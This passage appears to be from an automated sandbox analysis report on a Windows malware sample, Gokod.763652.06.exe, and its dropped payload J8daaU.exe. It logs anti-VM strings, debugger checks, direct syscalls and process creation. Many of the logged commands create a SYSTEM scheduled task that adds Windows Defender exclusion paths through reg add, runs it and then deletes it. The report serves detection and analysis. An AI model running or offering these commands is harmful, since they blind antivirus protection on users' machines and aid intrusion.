Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Documents\J8daaU.exeLast function: Thread delayed
Source: C:\Users\user\Documents\J8daaU.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeCode function: 8_2_00007FF6FCAE9AE0 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00007FF6FCAE9AE0
Source: C:\Users\user\Documents\J8daaU.exeCode function: 55_2_00007FF6FCAE9AE0 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,55_2_00007FF6FCAE9AE0
Source: C:\Users\user\Documents\J8daaU.exeThread delayed: delay time: 60000
Source: Gokod.763652.06.exeBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_5e38a278d114b813
Source: Amcache.hve.54.drBinary or memory string: VMware
Source: Amcache.hve.54.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Gokod.763652.06.exe, 00000000.00000003.1318204727.0000000000598000.00000004.00000020.00020000.00000000.sdmp, Gokod.763652.06.exe, 00000000.00000003.1353431063.0000000000598000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2416743689.000001F38545A000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B873634000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873634000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000005.00000002.2415231315.0000021B06687000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Gokod.763652.06.exeBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&354ae4d7&0&000000
Source: Amcache.hve.54.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: svchost.exe, 00000001.00000002.2417583087.000001F3FFE2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
Source: Gokod.763652.06.exeBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,root\vmwvmcihostdev
Source: Amcache.hve.54.drBinary or memory string: vmci.sys
Source: svchost.exe, 00000005.00000002.2414910480.0000021B0664B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Gokod.763652.06.exeBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&354ae4d7&0&000000
Source: Amcache.hve.54.drBinary or memory string: VMware20,1
Source: Gokod.763652.06.exe, Amcache.hve.54.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.54.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.54.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.54.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.54.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.54.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Gokod.763652.06.exeBinary or memory string: vmci.inf_amd64_5e38a278d114b813
Source: Amcache.hve.54.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.54.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.54.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.54.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Gokod.763652.06.exeBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.54.drBinary or memory string: VMware Virtual USB Mouse
Source: Gokod.763652.06.exeBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.17369862.B64.2012240522,BiosReleaseDate:12/24/2020,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1\
Source: svchost.exe, 00000005.00000002.2415075707.0000021B06664000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: Gokod.763652.06.exeBinary or memory string: VMware, Inc.e
Source: Amcache.hve.54.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.54.drBinary or memory string: VMware, Inc.
Source: svchost.exe, 00000005.00000002.2414910480.0000021B0664B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.54.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.54.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.54.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Gokod.763652.06.exeBinary or memory string: VMware-42 17 53 71 ea 62 82 e8-b2 93 b7 a7 7f 7a dc 93
Source: Amcache.hve.54.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Gokod.763652.06.exeBinary or memory string: VMware VMCI Bus Device0
Source: Gokod.763652.06.exeBinary or memory string: Manufacturer VMware, Inc.(vk
Source: Gokod.763652.06.exeBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.16460286.B64.2006250725,BiosReleaseDate:06/25/2020,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1(vk
Source: svchost.exe, 00000005.00000002.2414785385.0000021B0662B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.54.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.54.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Gokod.763652.06.exeBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Gokod.763652.06.exeBinary or memory string: vmci.inf_amd64_5e38a278d114b813,
Source: Amcache.hve.54.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.54.drBinary or memory string: vmci.syshbin`
Source: svchost.exe, 00000005.00000002.2414785385.0000021B0662B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Amcache.hve.54.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.54.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Gokod.763652.06.exeBinary or memory string: VMware7,1
Source: Amcache.hve.54.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: svchost.exe, 00000005.00000002.2414358163.0000021B06602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: Gokod.763652.06.exeBinary or memory string: VMware7,1p
Source: Gokod.763652.06.exeBinary or memory string: VMware, Inc.ps
Source: Gokod.763652.06.exeBinary or memory string: VMware, Inc.00
Source: svchost.exe, 00000005.00000002.2414588664.0000021B06622000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\Gokod.763652.06.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeCode function: 55_2_000002B87364A685 rdtsc 55_2_000002B87364A685
Source: C:\Users\user\Documents\J8daaU.exeCode function: 8_2_00007FF6FCAE4330 LdrLoadDll,8_2_00007FF6FCAE4330
Source: C:\Users\user\Documents\J8daaU.exeCode function: 8_2_00007FF6FCAE8904 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF6FCAE8904
Source: C:\Users\user\Documents\J8daaU.exeCode function: 8_2_00007FF6FCAE190C GetCurrentProcessId,ProcessIdToSessionId,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,GetFileAttributesW,GetLastError,FileTimeToLocalFileTime,FileTimeToSystemTime,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LocalFree,FileTimeToLocalFileTime,FileTimeToSystemTime,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LocalFree,FreeLibrary,8_2_00007FF6FCAE190C
Source: C:\Users\user\Documents\J8daaU.exeCode function: 8_2_00007FF6FCAEC070 GetProcessHeap,8_2_00007FF6FCAEC070
Source: C:\Users\user\Documents\J8daaU.exeProcess token adjusted: Debug
Source: C:\Users\user\Documents\J8daaU.exeCode function: 8_2_00007FF6FCAE29A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF6FCAE29A0
Source: C:\Users\user\Documents\J8daaU.exeCode function: 8_2_00007FF6FCAE8904 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF6FCAE8904
Source: C:\Users\user\Documents\J8daaU.exeCode function: 55_2_00007FF6FCAE29A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,55_2_00007FF6FCAE29A0
Source: C:\Users\user\Documents\J8daaU.exeCode function: 55_2_00007FF6FCAE8904 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_00007FF6FCAE8904

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\Gokod.763652.06.exeNtDelayExecution: Indirect: 0x1F9ED5Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtUnmapViewOfSection: Direct from: 0x7FFC9C6212CC
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Indirect: 0x7FFC9C2F497BJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C5518B1Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C6017DA
Source: C:\Users\user\Documents\J8daaU.exeNtOpenFile: Direct from: 0x7FFC9C5427DFJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C62E240
Source: C:\Users\user\Documents\J8daaU.exeNtMapViewOfSection: Direct from: 0x7FFC9C510B2FJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C580B7D
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C5DCC47Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C3418BAJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C540B7DJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C342615Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtClose: Direct from: 0x7FFC9C65D668
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C5918B1
Source: C:\Users\user\Documents\J8daaU.exeNtClose: Direct from: 0x7FFC9C581D80
Source: C:\Users\user\Documents\J8daaU.exeNtAllocateVirtualMemory: Indirect: 0x7FF6FCAE3FE4
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C5A6B78Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtOpenFile: Direct from: 0x7FFC9C646A8C
Source: C:\Users\user\Documents\J8daaU.exeNtOpenFile: Direct from: 0x7FFC9C606A8CJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C5EF5B9Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C52977CJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C5E6B78
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Indirect: 0x7FFC9C33497B
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C50225EJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C57F9AC
Source: C:\Users\user\Documents\J8daaU.exeNtMapViewOfSection: Direct from: 0x7FFC9C54ABE5
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C3818BA
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C302EF0Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C5C17DAJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C382615
Source: C:\Users\user\Documents\J8daaU.exeNtMapViewOfSection: Direct from: 0x7FFC9C50ABE5Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C32CDB8Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C5B67F9Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C5C0D32Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C5EE240Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Direct from: 0x7FFC9C520C71Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtProtectVirtualMemory: Indirect: 0x1811FA25E51Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeNtUnmapViewOfSection: Direct from: 0x7FFC9C53F9ACJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 448 -p 7992 -ip 7992
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7992 -s 2280
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\user\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\user\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeCode function: 8_2_00007FF6FCAEF750 cpuid 8_2_00007FF6FCAEF750
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
